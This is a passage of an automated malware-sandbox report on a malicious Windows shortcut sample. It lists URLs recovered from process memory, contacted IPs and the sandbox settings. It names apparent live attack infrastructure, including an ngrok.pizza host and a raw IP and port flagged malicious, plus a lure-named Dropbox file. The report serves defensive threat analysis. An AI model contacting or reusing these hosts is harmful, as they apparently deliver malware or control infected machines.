                                                                                                                                                                https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://permanently-removed.invalid/LogoutYxABmsedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.google.com/recaptcha/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://chromewebstore.google.com/msedge.exe, 0000000A.00000002.2425663714.00002CFC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2498672218.0000533000188000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.compowershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://dl-web.dropbox.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://app.hellofax.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://cfl.dropboxstatic.com/static/powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopxfontdrvhost.exe, 00000022.00000002.2878945473.00000000030BC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-despowershell.exe, 00000016.00000002.2613958790.000001A0A50CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.dropbox.com/service_worker.jspowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://paper.dropbox.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.hellofax.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://pal-test.adyen.compowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.compowershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizzapowershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A5057000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://permanently-removed.invalid/o/oauth2/revokemsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.hellosign.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.dropbox.com/page_success/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://go.microspowershell.exe, 00000003.00000002.2436196063.000002E14594B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://www.dropbox.com/pithos/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://sales.dropboxbusiness.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://piriform.com/go/app_cc_privacy_policy148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.00000000045B1000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://msn.com/msedge.exe, 0000000A.00000002.2427733245.00002CFC003A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://photos.dropbox.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          162.125.69.18
                                                                                                                                                                                                                          		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                          162.125.69.15
                                                                                                                                                                                                                          		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                          162.159.61.3
                                                                                                                                                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          2.16.158.73
                                                                                                                                                                                                                          		unknownEuropean Union
                                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                          142.250.181.65
                                                                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                          104.161.43.18
                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                          		53755IOFLOODUStrue
                                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          3.124.142.205
                                                                                                                                                                                                                          		23glcrtmzxqgwfpq3oujitt.ngrok.pizzaUnited States
                                                                                                                                                                                                                          		16509AMAZON-02UStrue
                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                                          		unknownunknownfalse

                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          192.168.2.6
                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1578255
                                                                                                                                                                                                                          Start date and time:2024-12-19 13:43:09 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 10m 35s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:44
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:QhR8Zp6fZs.lnk
                                                                                                                                                                                                                          renamed because original name is a hash value
